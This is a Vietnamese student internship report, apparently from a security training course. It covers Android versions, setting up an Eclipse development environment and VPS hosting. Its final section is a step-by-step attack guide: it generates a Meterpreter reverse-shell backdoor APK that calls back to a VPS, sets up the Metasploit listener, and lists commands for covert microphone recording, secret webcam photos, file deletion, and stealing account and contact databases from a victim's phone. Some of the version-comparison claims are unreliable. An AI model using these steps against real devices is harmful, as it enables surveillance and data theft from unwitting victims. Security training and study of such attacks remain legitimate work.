viết các ứng dụng phức tạp. Ví dụ, Android có thể cho phép người phát triển biết
61 
được vị trí của thiết bị và cho phép các thiết bị giao tiếp với nhau để có thể tạo nên 
mạng xã hội chia sẻ ngang hàng rộng khắp. Thêm nữa, Android còn bao gồm một 
bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng. 
3. Tìm hiểu sự giống nhau và khác nhau của phiên bản Android 2.x và 4.x: 
Theo thống kê tình hình những phiên bản hệ điều hành Android công bố đầu 
tháng 9 này đã cho thấy có nhiều sự thay đổi lớn. Phiên bản Gingerbread (2.3.x) dù 
đã ra mắt rất lâu rồi nhưng vẫn về vị trí thứ 2 với 30,7% thị phần, đứng sau phiên 
bản Jelly Bean (4.1.x và 4.2.x) với 45,1% thị phần và về vị trí thứ 3 là phiên bản Ice 
Cream Sandwich (4.0.x) với 21,7% thị phần. 
Ta có thể tải các tài liêu về các phiên bản Android do Google công bố ở link sau 
để nghiên cứu và tìm hiểu: http://source.android.com/compatibility/downloads.html 
Ở đây ta sẽ thấy được 4 điểm khác nhau rõ nét nhất của 2 phiên bản này: 
- Giao diện (Graphical User Interface) 
- Tính năng (Functionality) 
- Giao thức mạng (Network Protocol) 
- Yêu cầu phần cứng (Hardware) 
3.1 Giao diện người dùng: 
Android 2.3 Android 4.0 
Giao diện đơn giản Giao diện trong suốt, tinh tế và 
phong cách hơn 
Không hỗ trợ phím ảo Hỗ trợ phím ảo 
Không có widgets menu Có widgets menu
62 
3.2. Tính năng: 
Android 2.3 Android 4.0 
Tối ưu hóa cho smart phone Tối ưu hóa cho cả tablets và smart 
phone 
Xóa tất cả thông báo Xóa được từng thông báo 
Chỉ có thể trả lời cuộc gọi khi màn 
hình bị khóa 
Có thể thực hiện nhiều tính năng 
khi màn hình bị khóa 
Không hỗ trợ nhận biết khuôn mặt Mở khóa bằng nhận biết khuôn 
mặt (face unclock) 
Không có quản lý mức độ sử dụng 
dữ liệu 
Có quản lý mức độ xử dụng dữ 
liệu 
Quay phim độ nét không quá 480p Quay phim độ nét lên tới 1080p 
3.3. Giao thức mạng: 
Android 2.3 Android 4.0 
Không hỗ trợ giao thức https Hỗ trợ giao thức https
63 
3.4. Yêu cầu phần cứng: 
Android 2.3 Android 4.0 
Cung cấp ít nhất 128MB cho 
kernel 
Cung cấp ít nhất 340MB cho 
kernel 
Dung lượng RAM ít nhất là 
150MB 
Dung lượng RAM ít nhất là 
350MB 
Thiết bị phải có khả năng tải về 
một file 55MB hoặc hớn hơn 
Thiết bị phải có khả năng tải về 
một file 100MB hoặc lớn hơn 
Độ phân giải màn hình ít nhất 
100dpi 
Độ phân giải màn hình ít nhất 
120dpi 
Yêu cầu phải có các phím vật lý Không yêu cầu phải có các phím 
vật lý 
Kiểm tra hiệu suất dựa trên thời 
gian mở ứng dụng: 
Trình duyệt: ít hơn 1300ms 
MMS/SMS: ít hơn 700ms 
Báo thức: ít hơn 650ms 
Kiểm ra hiệu suất dựa trên thời 
gian mở ứng dụng: 
Trình duyệt: ít hơn 1300ms 
MMS/SMS: ít hơn 700ms 
Cài đặt: ít hơn 700ms
64 
V. Tạo máy ảo android trên Eclipse 
1, Bộ Java SE Development Kit (JDK) 
JDK cung cấp một bộ công cụ cho cho người phát triển ứng dụng bằng ngôn ngữ 
lập trình Java. Phần mềm được dùng để viết Applet Java hay những ứng dụng Java 
khác, gồm có trình biên dịch, trình thông dịch, sửa lỗi, chạy applet và tài liệu nghiên 
cứu. 
JDK cho phép người sử dụng lưu, chỉnh sửa, in và biên dịch mã Java tạo ra. công cụ 
này có thể được sử dụng để chạy và gỡ lỗi Java applet mà không cần phải thông qua 
một trình duyệt web. Với tiện ích này, người dùng có thể tạo cơ sở dữ liệu cho việc 
lập trình bằng Java, phát hiện các xung đột file JAR. Người dùng cũng có thể biên 
dịch tập tin IDL sang Java. 
Để download bộ JDK các bạn truy cập link sau : 
http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads- 
1880260.html
65 
Các bạn chọn Accept License Agreement sau đó chọn phiên bản phù hợp với hệ 
điều hành đang sử dụng và download về.
66 
Sau khi download hoàn tất chúng ta tiến hành giải nén và cài đặt bộ java SDK này. 
Quá trình cài đặt khá đơn giản ta chỉ cần nhấn next cho đến khi hoàn tất cài đặt. 
Trong quá trình cài đặt ta có thể chọn vị trí lưu bằng cách chọn change và chọn nơi 
lưu. 
Sau khi cài đặt xong có thể kiểm tra lại bằng cách vào cửa sổ cmd nhập lệnh “Java”
67
68 
2, Eclipse IDE và Android SDK 
- Eclipse là cơ sở cho việc xây dựng và chạy các công cụ phát triển phần mềm tích 
hợp, xuyên suốt từ đầu đến cuối. Nền tảng này bao gồm các thành phần phần mềm 
mã nguồn mở được các nhà cung cấp công cụ sử dụng để xây dựng các giải pháp 
cắm thêm vào Các bàn làm việc (Workbench) phần mềm tích hợp. Nền tảng Eclipse 
tích hợp công nghệ được biểu diễn thông qua một khung công tác được thiết kế và 
triển khai thực hiện rõ ràng. 
- Android SDK là một máy ảo của Android trên PC.SDK hỗ trợ bạn lập trình các 
ứng dụng của Android trên PC 
Để Eclipse và Android SDK nói trên các bạn truy cập link sau: 
http://developer.android.com/sdk/index.html 
Sau đó chọn 
Sau đó tích vào I have read and…. Sau đó chọn phiên bàn Win và tiến hành 
download
69 
Sau khi tải về hoàn tất ta giải nén và tiến hành cài đặt eclipse và SDK
70 
2.1, Cài đặt Eclipse 
Mở file setup Eclipse, chọn đường dẫn ( vị trí lưu ) sau đó chọn ok.
71 
Giao diện của eclipse 
2.2, Cài đặt Android SDK 
Chọn Run as administrator file SDK manager
72 
Chọn như hình sau và tiến hành download
73
74 
Sau khi quá trình download hoàn tất, ta chọn Accpect License và chọn Install. 
3, Tích hợp Android SDK vào Eclipse: 
Sau khi đã hoàn tất cài đặt Eclipse và Android SDK ta tiến hành tích hợp Android 
SDK vào Eclipse. 
Bước 1: Mở Eclipse
75 
Vào Help > Install new software… > Add
76 
Đặt tên ở mục Name: 
Ở mục Location ta nhập một trong hai địa chỉ sau 
https://dl.google.com/android/eclipse hoặc https://dl-ssl.google.com/android/eclipse 
Sau đó chọn ok 
Bước 2: Ở cửa sổ Name > Tick vào Developer Tools
77 
Bước 3: Chọn các Next > Next > Accept > Next > Finish – Run in Background 
Bước 4: Vào Windows > Preferences > Android > Browse > Chỉ đường dẫn thư 
mục Android SDK đã tải > Apply > OK 
Bước 5: Khởi đông lại Eclipse
78 
VI. KẾT NỐI MÁY CHỦ ẢO VPS 
1, Giới thiệu máy chủ ảo VPS: 
- Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy 
chủ vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host 
thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con 
số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều. 
- Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn 
quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn 
chế 100% khả năng bị hack local. 
- Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài 
nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng 
đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn 
công thì mọi tài khoản khác trên VPS đều hoạt động bình thường. 
- VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn 
nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi 
hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,… 
2, Đặc điểm của VPS: 
- Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung 
lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng. 
- Tiết kiệm được nhiều chi phí so với việc thuê một server riêng. 
- Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng 
dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web 
bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao… 
- Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài 
nguyên mà không cần phải khởi động lại hệ thống. 
- Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
79 
3, Giá trị khi sử dụng VPS: 
- Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS 
phù hợp. 
- Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng. 
- Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng. 
- Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection. 
- Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh. 
4, Kết nối VPS: 
- Đối với máy hệ điều hành Windows, để có thể kết nối với máy chủ ảo VPS, ta 
cần sử dụng ứng dụng Remote Desktop Connection. 
- Để khởi động ứng dụng RDC này, ta chỉ cần vào Start > All Programs > 
Accessories > Remote Desktop Connection 
- Sau đó ta cần nhập vào Địa chỉ IP, Username và Password được cung cấp khi ta 
đăng ký tài khoản VPS. 
- Như vậy là ta đã có thể kết nối với máy chủ ảo VPS.
80 
VII. CÀI ĐẶT METASPLOIT TRÊN VPS 
Sau khi đã kết nối được máy VPS bằng quyền Administrator, ta tiến hành 
tải và cài đặt phần mềm Metasploit để phục vụ cho việc tấn công điện thoại 
Android 
1. Giới thiệu về phần mềm Metasploit: 
- Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm 
tra, tấn công và khai thác lỗi của các service. 
- Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những 
components được viết bằng C, Assembler, và Python. 
- Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. 
2. Giới thiệu payload Meterpreter: 
- Meterpreter, viết tắt từ Meta-Interpreter là một advanced payload có trong 
Metasploit framework. 
- Muc đích của Meterpreter là để cung cấp những tập lệnh để khai thác, tấn câng 
các máy remote computers. Nó được viết từ các developers dưới dạng shared 
object( DLL) files. 
- Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn 
không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống 
virus. 
- Trong bài viết này, để tấn công vào điện thoại Android thì ta sẽ sử dụng payload 
Meterpreter này.
81 
3. Cài đặt Metasploit: 
Bước 1: Tải Metasploit bản mới nhất từ trang chủ www.metasploit.com hoặc trang 
download http://www.rapid7.com/products/metasploit/download.jsp . Ta sử dụng 
bản Community. 
Bước 2: Tiến hành đăng ký để tải Metasploit 
Sau khi đăng ký, ta có thể tải về. Và ta nhận được 1 mail có chứa Key để Active 
Metasploit sau khi cài đặt. Mail này gửi về địa chỉ Email mà bạn đã đăng ký.
82 
Bước 3: Cài đặt phần mềm qua file đã tải về 
- Chọn thư mục cài đặt 
- Chọn Port của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790 
- Chọn server và ngày hết hạn, để mặc định. 
- Nhấp Next và Metasploit sẽ được cài đặt vào thư mục đã chọn 
- Nhấp Finish và truy cập đến giao diện web của chương trình 
Bước 4: Active phần mềm Metasploit bằng cách truy cập vào link 
https://localhost:3790/ 
Tạo một tài khoản sử dụng: 
Nhập Key đã nhận từ email: 
Chọn ACTIVATE LICENSE
83 
Bước 5: Khởi động Metasploit bằng cách vào Start > Progams > Metasploit > 
Metasploit Console
84 
IIX. T N CÔNG Ấ MÁY ANDROID TỪ MÁY VPS 
1. Tạo ứng dụng chứa mã độc trên Kali Linux: 
Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại Android 
Bước 1: Khởi động máy ảo Kali Linux. Mở Terminal. 
Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter: 
“msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS> 
lport=<Mã port muốn dùng> R > <đường dẫn lưu trữ> / <tên file>” 
Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 
lport=4444 R> /root/Desktop/hack.apk 
2. Tấn công điện thoại Android: 
Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể 
mất vài chục phút. 
Bước 2: Tiến hành thiết đặt payload bằng các lệnh 
 “ use exploit/multi/handler ” 
 “ set payload android/meterpreter/reverse_tcp ” 
 “ set lhost 14.0.21.162 ” 
 “ set lport 4444 ” 
 “ run ” 
Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở trên. 
Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy 
Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận 
được thông báo như sau:
85 
Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác
86 
3. Các phương thức tấn công được sử dụng: 
Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân. 
3.1 Ghi âm lén: 
Sử dụng lệnh: “ record_mic <số giây ghi âm> ” 
3.2 Sử dụng camera: 
Xem danh sách webcam của thiết bị: “ webcam_list ” 
Chụp ảnh lén: “webcam_snap <mã camera>” 
3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard: 
Di chuyển vào thư mục bằng lệnh: cd 
Tải về bằng lệnh: download <tên file> 
Xóa tập tin bằng lệnh: rm <tên file>
87
88 
3.4 Truy cập trực tiếp vào hệ thống: 
Truy cập vào hệ thống bằng lệnh: “shell” > “su” 
Kiểm tra máy đã root hay chưa bằng lệnh: “whoami” 
Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể 
tiếp tục tấn công. 
3.5 Truy cập và khai thác tài khoản người dùng: 
Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l” 
Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard” 
Trở về meterpreter và tải file accounts.db về:
89 
Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db 
3.6 Truy cập và đánh cắp danh bạ điện thoại: 
Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại: 
“cd /data/data/com.android.providers.contacts/databases” 
Copy về thẻ sdcard và tải về máy
90 
Xem nội dung của contacts2.db bằng SQLite Manager
91 
3.7 Một số câu lệnh khác: 
- Để biết thêm về các lệnh có thể thực hiện ta dùng help 
- Để xem thông tin về máy, nhập lệnh sysinfo 
- Để xem các tác vụ đang chạy gõ ps 
- Xem ip của máy bị hack ta gõ ipconfig 
- Xem danh sách thư mục, file gõ ls 
- Để upload gõ lệnh upload 
- ls -l danh mục file và các quyền 
- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền 
/DATA 
/DATA/APP 
/DATA/SYSTEM 
/DATA/SYSTEM/accounts.db 
/DATA/SYSTEM/SYNC/accounts.xml 
/SYSTEM/APP/ 
- Để xem danh sách và down load các file hay thay đổi các file trong ROM 
Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập 
Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename 
Ví dụ chmod -R 777 /data 
Ctrl + C để quay lại
92 
PHỤ LỤC I : VIDEO QUÁ TRÌNH THỰC HIỆN 
· Giới thiệu bản thân 
https://www.youtube.com/watch?v=CxY2FVXRLR0 
· Cài đặt Kali Lunix trên máy ảo VMware 
https://www.youtube.com/watch?v=UQxMjJsxMFY 
· Tạo Applications chứa mã độc 
https://www.youtube.com/watch?v=OQrSzidyMhs 
· Tạo link liên kết chứa mã độc bằng XSSF 
http://youtu.be/VNaJDwMrIYI 
· Cài đặt JDK – Java SE Development Kit 
http://youtu.be/GIzDLbKlJv0 
· Tích hợp JDK và Eclipse, Tạo máy ảo Android trên Eclipse 
http://youtu.be/bqCpa9NTbd4 
· Tấn công Android từ môi trường VPS 
http://youtu.be/FccqtFVeLz4 
· Tổng kết thuận lợi, khó khan trong quá trình thực tập 
https://www.youtube.com/watch?v=bqi3-sfqBBg
93 
PHỤ LỤC II : TÀI LIỆU THAM KHẢO 
· http://www.quantrimang.com.vn/lo-hong-bao-mat-nghiem-trong-de-doa-82- 
may-android-110510 
· http://sinhvienit.net/forum 
· http://forum.bkav.com.vn 
· http://developer.android.com/sdk/index.html#download 
· http://www.oracle.com/technetwork/java/javase/downloads 
· http://choimobile.vn/forums/#thao-luan-hdh-android.62 
· http://www.oracle.com/technetwork/server- storage/ 
virtualbox/downloads/index.html 
· http://www.genymotion.com/ 
· http://www.whitehat.vn/threads/ 
· https://code.google.com/p/dex2jar/ 
· https://code.google.com/p/innlab/downloads/detail?name=jd-gui- 
0.3.3.windows.zip& 
· http://mobilelife.vn/resources/super-apk-tool-v2-0-cong-cu-chinh-sua-apk-bang-giao- 
dien-cuc-manh.12/ 
· Giáo trình khóa học System Hacking – Trung tâm đào tạo ATHENA – 
www.Athena.Edu.Vn

More Related Content

What's hot

Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athenaLe Chuong
 
Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014Seavar Neuvell
 
Đề tài: Ứng dụng phần mềm tạo bài tập & kiểm tra trắc nghiệm online THPT Đoàn...
Đề tài: Ứng dụng phần mềm tạo bài tập & kiểm tra trắc nghiệm online THPT Đoàn...Đề tài: Ứng dụng phần mềm tạo bài tập & kiểm tra trắc nghiệm online THPT Đoàn...
Đề tài: Ứng dụng phần mềm tạo bài tập & kiểm tra trắc nghiệm online THPT Đoàn...Viết thuê trọn gói ZALO 0934573149
 
Báo cáo cho athena
Báo cáo cho athenaBáo cáo cho athena
Báo cáo cho athenalehuyvinh
 
Bao_cao_ttcn
Bao_cao_ttcnBao_cao_ttcn
Bao_cao_ttcnTrung Mai
 
Xây dựng ứng dụng hỗ trợ học tiếng anh trên thiết bị android
Xây dựng ứng dụng hỗ trợ học tiếng anh trên thiết bị androidXây dựng ứng dụng hỗ trợ học tiếng anh trên thiết bị android
Xây dựng ứng dụng hỗ trợ học tiếng anh trên thiết bị androidTrần Võ Khôi Nguyên
 
Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên Android
Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên AndroidBáo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên Android
Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên AndroidDlinh Truong
 
1.gioi thieu-ai-e learning 2020 (dai hoc - cao dang) v4
1.gioi thieu-ai-e learning 2020 (dai hoc - cao dang) v41.gioi thieu-ai-e learning 2020 (dai hoc - cao dang) v4
1.gioi thieu-ai-e learning 2020 (dai hoc - cao dang) v4taytuutronghoa
 
Báo cáo thực tập Athena
Báo cáo thực tập AthenaBáo cáo thực tập Athena
Báo cáo thực tập AthenaPhong Nguyễn
 
Báo cáo thực tập công ty ATHENA.
Báo cáo thực tập công ty ATHENA.Báo cáo thực tập công ty ATHENA.
Báo cáo thực tập công ty ATHENA.Tân Duy
 
Bao cao cuoi ki_ Nguyen Dang Van
Bao cao cuoi ki_ Nguyen Dang VanBao cao cuoi ki_ Nguyen Dang Van
Bao cao cuoi ki_ Nguyen Dang VanNguyễn Vân
 
File báo cáo TT Athena
File báo cáo TT AthenaFile báo cáo TT Athena
File báo cáo TT AthenaTôi Là Duy
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tậpTai Ly
 

What's hot (19)

Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athena
 
Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014
 
Đề tài: Ứng dụng phần mềm tạo bài tập & kiểm tra trắc nghiệm online THPT Đoàn...
Đề tài: Ứng dụng phần mềm tạo bài tập & kiểm tra trắc nghiệm online THPT Đoàn...Đề tài: Ứng dụng phần mềm tạo bài tập & kiểm tra trắc nghiệm online THPT Đoàn...
Đề tài: Ứng dụng phần mềm tạo bài tập & kiểm tra trắc nghiệm online THPT Đoàn...
 
Báo cáo cho athena
Báo cáo cho athenaBáo cáo cho athena
Báo cáo cho athena
 
đồ áN
đồ áNđồ áN
đồ áN
 
Bao_cao_ttcn
Bao_cao_ttcnBao_cao_ttcn
Bao_cao_ttcn
 
Xây dựng ứng dụng hỗ trợ học tiếng anh trên thiết bị android
Xây dựng ứng dụng hỗ trợ học tiếng anh trên thiết bị androidXây dựng ứng dụng hỗ trợ học tiếng anh trên thiết bị android
Xây dựng ứng dụng hỗ trợ học tiếng anh trên thiết bị android
 
Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên Android
Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên AndroidBáo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên Android
Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên Android
 
Đề tài: Ứng dụng học từ vựng tiếng anh trên điện thoại, HAY, 9đ
Đề tài: Ứng dụng học từ vựng tiếng anh trên điện thoại, HAY, 9đĐề tài: Ứng dụng học từ vựng tiếng anh trên điện thoại, HAY, 9đ
Đề tài: Ứng dụng học từ vựng tiếng anh trên điện thoại, HAY, 9đ
 
1.gioi thieu-ai-e learning 2020 (dai hoc - cao dang) v4
1.gioi thieu-ai-e learning 2020 (dai hoc - cao dang) v41.gioi thieu-ai-e learning 2020 (dai hoc - cao dang) v4
1.gioi thieu-ai-e learning 2020 (dai hoc - cao dang) v4
 
Báo cáo thực tập Athena
Báo cáo thực tập AthenaBáo cáo thực tập Athena
Báo cáo thực tập Athena
 
Báo cáo thực tập công ty ATHENA.
Báo cáo thực tập công ty ATHENA.Báo cáo thực tập công ty ATHENA.
Báo cáo thực tập công ty ATHENA.
 
Bao cao cuoi ki_ Nguyen Dang Van
Bao cao cuoi ki_ Nguyen Dang VanBao cao cuoi ki_ Nguyen Dang Van
Bao cao cuoi ki_ Nguyen Dang Van
 
Bao cao athena
Bao cao athenaBao cao athena
Bao cao athena
 
Đề tài: Xây dựng ứng dụng Android truy xuất cơ sở dữ liệu, HAY
Đề tài: Xây dựng ứng dụng Android truy xuất cơ sở dữ liệu, HAYĐề tài: Xây dựng ứng dụng Android truy xuất cơ sở dữ liệu, HAY
Đề tài: Xây dựng ứng dụng Android truy xuất cơ sở dữ liệu, HAY
 
File báo cáo TT Athena
File báo cáo TT AthenaFile báo cáo TT Athena
File báo cáo TT Athena
 
Luận văn: Xây dựng ứng dụng Android xem video trực tuyến, HAY
Luận văn: Xây dựng ứng dụng Android xem video trực tuyến, HAYLuận văn: Xây dựng ứng dụng Android xem video trực tuyến, HAY
Luận văn: Xây dựng ứng dụng Android xem video trực tuyến, HAY
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tập
 
Đề tài: Hệ thống điều khiển quá trình khoan 2 giai đoạn, HAY
Đề tài: Hệ thống điều khiển quá trình khoan 2 giai đoạn, HAYĐề tài: Hệ thống điều khiển quá trình khoan 2 giai đoạn, HAY
Đề tài: Hệ thống điều khiển quá trình khoan 2 giai đoạn, HAY
 

Viewers also liked

3. задержание последа у коров.
3. задержание последа у коров.3. задержание последа у коров.
3. задержание последа у коров.Dmitry Strugatsky
 
Client presentation
Client presentationClient presentation
Client presentationEmily Reith
 
Dropping the jaw in the mitten
Dropping the jaw in the mittenDropping the jaw in the mitten
Dropping the jaw in the mittenRachel Kern
 
Tecnologia digital maria fernanda rodriguez
Tecnologia digital maria fernanda rodriguezTecnologia digital maria fernanda rodriguez
Tecnologia digital maria fernanda rodriguezcarolcaballos
 
ブレイブヒヤリスト 俵 ちづる
ブレイブヒヤリスト 俵 ちづるブレイブヒヤリスト 俵 ちづる
ブレイブヒヤリスト 俵 ちづるRucle Ehc
 
Мебель Элио - невозможное возможно
Мебель Элио - невозможное возможноМебель Элио - невозможное возможно
Мебель Элио - невозможное возможноLudmila Makarova
 
Gerencia De Calidad
 Gerencia De Calidad Gerencia De Calidad
Gerencia De Calidadhedion
 
Presentation tips YRS 2014
Presentation tips YRS 2014Presentation tips YRS 2014
Presentation tips YRS 2014moominlounge
 
It’s a jungle out there but we know july 2014
It’s a jungle out there but we know july 2014It’s a jungle out there but we know july 2014
It’s a jungle out there but we know july 2014michaelhnewman
 
How to Make a Good Presentation
How to Make a Good PresentationHow to Make a Good Presentation
How to Make a Good PresentationAdewumi Olatunji
 
K 20to-2012-20caregiving-20teacher-27s-20guide-131227142939-phpapp01
K 20to-2012-20caregiving-20teacher-27s-20guide-131227142939-phpapp01K 20to-2012-20caregiving-20teacher-27s-20guide-131227142939-phpapp01
K 20to-2012-20caregiving-20teacher-27s-20guide-131227142939-phpapp01jen Saludar
 

Viewers also liked (14)

3. задержание последа у коров.
3. задержание последа у коров.3. задержание последа у коров.
3. задержание последа у коров.
 
MPJC Beyond Sports
MPJC Beyond SportsMPJC Beyond Sports
MPJC Beyond Sports
 
Client presentation
Client presentationClient presentation
Client presentation
 
Dropping the jaw in the mitten
Dropping the jaw in the mittenDropping the jaw in the mitten
Dropping the jaw in the mitten
 
Aubreygela
AubreygelaAubreygela
Aubreygela
 
Tecnologia digital maria fernanda rodriguez
Tecnologia digital maria fernanda rodriguezTecnologia digital maria fernanda rodriguez
Tecnologia digital maria fernanda rodriguez
 
בהוקרה לחיילי צהל
בהוקרה לחיילי צהלבהוקרה לחיילי צהל
בהוקרה לחיילי צהל
 
ブレイブヒヤリスト 俵 ちづる
ブレイブヒヤリスト 俵 ちづるブレイブヒヤリスト 俵 ちづる
ブレイブヒヤリスト 俵 ちづる
 
Мебель Элио - невозможное возможно
Мебель Элио - невозможное возможноМебель Элио - невозможное возможно
Мебель Элио - невозможное возможно
 
Gerencia De Calidad
 Gerencia De Calidad Gerencia De Calidad
Gerencia De Calidad
 
Presentation tips YRS 2014
Presentation tips YRS 2014Presentation tips YRS 2014
Presentation tips YRS 2014
 
It’s a jungle out there but we know july 2014
It’s a jungle out there but we know july 2014It’s a jungle out there but we know july 2014
It’s a jungle out there but we know july 2014
 
How to Make a Good Presentation
How to Make a Good PresentationHow to Make a Good Presentation
How to Make a Good Presentation
 
K 20to-2012-20caregiving-20teacher-27s-20guide-131227142939-phpapp01
K 20to-2012-20caregiving-20teacher-27s-20guide-131227142939-phpapp01K 20to-2012-20caregiving-20teacher-27s-20guide-131227142939-phpapp01
K 20to-2012-20caregiving-20teacher-27s-20guide-131227142939-phpapp01
 

Similar to Bao cao tong ket

Báo cáo cuối kỳ athena
Báo cáo cuối kỳ athenaBáo cáo cuối kỳ athena
Báo cáo cuối kỳ athenaLeHongQuang2912
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tapLeo Aurico
 
System hacking_Athena
System hacking_AthenaSystem hacking_Athena
System hacking_AthenaHuynh Khang
 
Báo cáo System hacking
Báo cáo System hackingBáo cáo System hacking
Báo cáo System hackingHuynh Khang
 
Triển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internetTriển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internetLong Vũ
 
Lehoangphi bacaocuoiky
Lehoangphi bacaocuoikyLehoangphi bacaocuoiky
Lehoangphi bacaocuoikyLehoangphi581
 
Baocaothuctap quan
Baocaothuctap quanBaocaothuctap quan
Baocaothuctap quanMinh Quan
 
Báo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương Tàu
Báo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương TàuBáo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương Tàu
Báo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương TàuTàu Hành
 
Baocaothuctap minhquan
Baocaothuctap minhquanBaocaothuctap minhquan
Baocaothuctap minhquanMinh Quan
 
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...Phan Hữu Linh
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athenaCương Nguyêñ
 
Main thuc tap - duy
Main thuc tap - duyMain thuc tap - duy
Main thuc tap - duyTôi Là Duy
 
Báo cáo tổng kết thực tập Athena
Báo cáo tổng kết thực tập AthenaBáo cáo tổng kết thực tập Athena
Báo cáo tổng kết thực tập AthenaNguyễn Khoa
 
Bctt
BcttBctt
BcttLIL55
 

Similar to Bao cao tong ket (20)

Báo cáo cuối kỳ athena
Báo cáo cuối kỳ athenaBáo cáo cuối kỳ athena
Báo cáo cuối kỳ athena
 
System Hacking
System HackingSystem Hacking
System Hacking
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
System hacking_Athena
System hacking_AthenaSystem hacking_Athena
System hacking_Athena
 
Báo cáo System hacking
Báo cáo System hackingBáo cáo System hacking
Báo cáo System hacking
 
